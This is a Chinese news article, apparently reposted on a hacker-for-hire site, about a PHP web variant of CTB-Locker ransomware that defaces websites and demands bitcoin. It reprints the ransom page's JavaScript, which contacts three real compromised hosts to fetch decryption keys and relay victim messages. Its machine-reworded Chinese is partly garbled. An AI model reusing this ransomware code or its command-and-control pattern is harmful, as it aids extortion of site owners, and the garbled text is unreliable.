Web版勒索软件CTB-Locker PHP源码现身GitHub

访客5年前关于黑客接单477

勒索软件CTB-Locker呈现其Web演化版别,可感染网页站点。据剖析,其编码为选用PHP编写,现在源码已被保管至GitHub上。
Web版勒索软件CTB-Locker的初次呈现
就在本年西方情人节前夕,英国的一位站长却有一个不愉快的发现,他查看到其办理的网站页面遭受篡改,篡改页面上呈现的信息看起来跟电脑感染歹意勒索软件的景象类似,其主要信息是让站点办理员付出比特币,交换相应目录文件的解密,以便使站点康复正常。篡改页面如下图,


 
在被验证为初次针对网页的勒索工作后,该工作便得到极大的重视。但其实作为服务器办理员来说,初步都只是期望这仅仅是一次性工作,而不是进犯者预谋的初步。
在初始阶段,实际上并无发现其他感染工作,而状况在曩昔的一个星期中有了极大的改变。在这段时间内频频呈现上述的网页勒索感染工作。据悉,到现在有超越100个同类型工作被发现。在篡改的信息中其暗地操纵者要求受害者付出0.4个比特币,而且如在两天内未完成付出,付出额度将提高至0.8个比特币。以下为其要求付出比特币的源码:
script>
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
   $.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
         if (data["status"] == "success") {
            onsuccess(data);
         } else {
            alert(data["status"]);
         }
      }, 'json'
   ).fail(function() {
      alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
      iadmin = (iadmin + 1) % 3;
   });
}
$('#decrypt').click(function() {
   post_admin("decrypt=", function(data) {
      alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
   });
});
$('#dectest').click(function() {
   post_admin("dectest=&secret="+($("#secret").val()), function(data) {
      alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
   });
});
$('#sendmsg').click(function() {
   msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
   post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
      alert('Thank you for feedback!');
   });
});
$('#recvmsg').click(function() {
   post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
      $("#chatmsg").val(data["answer"]);
   });
});
   script>
该勒索程序在勒索付出告诉上,跟CTB-Locker为同一模型。但单单从技术上来看,这跟“声名远扬”的CTB-Locker勒索软件的状况不符。因其仅运转于Windows桌面环境,而并无法运转在 Linux Web服务器上。
Web版CTB-Locker选用PHP编写
来自 Stormshield的安全剖析员Benkow,设法剖析勒索软件的运转形式并从一个受感染的目标提取到了源代码。随后,Benkow将Web版CTB-Locker 源码上传至 KernelMode论坛上,供其他安全研讨人员剖析和研讨。而Web版CTB-Locker的“知名度”便敏捷提高,其源码也被保管至GitHub。
源代码地址请点击:GitHub
考虑到,此前勒索软件Hidden Tear源码也保管至GitHub,但工作终究却没有朝着有利于用户的方向发展。而结合当时的景象,能够预见,在接下来的数个月中,将或许呈现大规模的针对网页站点进行的进犯感染。

[1] [2]  黑客接单网

相关文章

揭秘美国运通网络垂钓活动

咱们看到许多针对电子邮件、银行、PayPal、信用卡以及其他财政凭证的网上欺诈活动。本事例与其他许多事例略有不同,愈加杂乱,旨在加大反网络垂钓东西进行剖析和阻挠的难度。它伪装成美国运通发送给客户有关帐...

web前端技能,做一个超有用的待办事项管理工具web版别

经过方案开端每一天是使你走向成功的要害,时间管理的重要性在这里我就不多说了,奉上一个web版别待办事项管理工具教程 这是终究作用图 接下来一步步完成它 html代码 html代码 对应的CSS代码 作...

由此次阿里云事情谈粗犷的安全防护手法

 昨日阿里接连爆出了两个有意思的事情,一是阿里云服务器呈现毛病,导致误删除了许多用户文件( http://www.weibo.com/1747505067/CyvEkrxPS );二是阿里供认下一年校...

谈谈Json格式下的CSRF攻击-黑客接单平台

一、CSRF缝隙简介 csrf缝隙的成因便是网站的cookie在浏览器中不会过期,只需不封闭浏览器或许退出登录,那今后只需是拜访这个网站,都会默许你现已登录的状况。而在这个期间,进犯者发送了结构好的c...

EMV体系的安全性评价

电子商务、移动付出的遍及,顾客越来越少随身携带现金,人们玩笑道“小偷都快赋闲了”。但在互联网上,靠偷盗用户电子账户资金、虚拟财物的“网络小偷”却非常猖狂。 各种途径走漏的个人信息被加工、转卖,并用于电...

使用Homograph的复杂鱼叉渗透分析-黑客接单平台

在曩昔的几个月里,咱们做了一些有关创立网络垂钓电子邮件的研讨,这些创立的垂钓邮件足以诈骗那些专业的安全人员。因而,咱们正在研讨一个适当陈旧的安全论题:Punycode域和IDN同形异义词进犯。 Pun...